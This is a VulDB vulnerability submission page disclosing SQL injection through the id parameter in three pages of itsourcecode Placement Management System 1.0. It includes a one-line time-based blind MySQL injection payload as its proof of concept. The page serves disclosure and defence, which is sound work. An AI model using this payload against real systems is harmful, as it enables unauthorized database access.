Enviar #383865: itsourcecode Placement Management System 1.0 SQLiinformación

Títuloitsourcecode Placement Management System 1.0 SQLi
DescripciónIn the view_company.php, view_drive.php, and view_student.php pages, an id parameter can be passed to query data. However, due to inadequate filtering of the id parameter on these pages, SQL injection vulnerabilities are present. ——————————POC——————————— Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 5490 FROM (SELECT(SLEEP(5)))qDPR) AND 'HyHB'='HyHB
Fuente⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE11-4.md
Usuario
 Dee.Mirage (UID 71702)
Sumisión2024-07-31 16:22 (hace 2 años)
Moderación2024-08-03 08:49 (3 days later)
EstadoAceptado
Entrada de VulDB273543 [itsourcecode Placement Management System 1.0 view_company.php ID inyección SQL]
Puntos20

AnteriorVisión De ConjuntoPróximo

Might our Artificial Intelligence support you?

Check our Alexa App!